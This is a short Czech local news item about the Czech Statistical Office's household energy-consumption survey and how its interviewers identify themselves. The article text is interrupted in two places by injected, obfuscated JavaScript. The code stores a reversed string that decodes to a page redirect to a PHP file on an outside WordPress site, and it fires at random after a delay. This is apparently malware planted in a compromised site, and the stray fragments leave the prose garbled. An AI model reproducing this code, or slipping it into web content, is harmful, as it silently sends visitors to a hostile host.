Rainbow page separator

Pracovníci statistického úřadu se prokáží průkazem a pověřením

Čtvrtek, 13. srpna 2015

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Český statistický úřad aktuálně organizuje výběrové šetření o energetické spotřebě v domácnostech. Obyvatelé města se tak mohou setkat s tazateli, kteří je budou žádat o zodpovězení jejich otázek. Hlavním cílem veřejného šetření je získat aktuální údaje o spotřebě paliv a energií v domácnostech, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to podle účelu jejich použití na konkrétní činnost. Vlastní statistické šetření probíhá až do poloviny ledna příštího roku prostřednictvím speciálně vyškolených tazatelů. Ti["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to pracovníci zapojení do šetření mezi veřejností se lidem prokazují průkazem tazatele a příslušným pověřením. Ve všech fázích zpracování je podle statistického úřadu zaručena anonymita zjištěných údajů a získaná data jsou důsledně chráněna před zneužitím.